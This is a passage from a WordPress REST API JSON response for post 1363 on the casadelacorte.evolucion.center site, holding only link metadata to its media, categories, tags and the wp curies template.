cion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1363"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1363"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1363"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}